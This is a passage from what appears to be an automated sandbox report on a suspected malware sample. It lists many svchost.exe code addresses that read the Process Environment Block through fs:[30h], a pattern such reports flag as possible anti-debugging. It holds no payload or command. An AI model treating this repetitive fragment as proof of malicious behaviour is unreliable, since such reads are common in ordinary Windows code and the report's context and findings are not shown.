                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
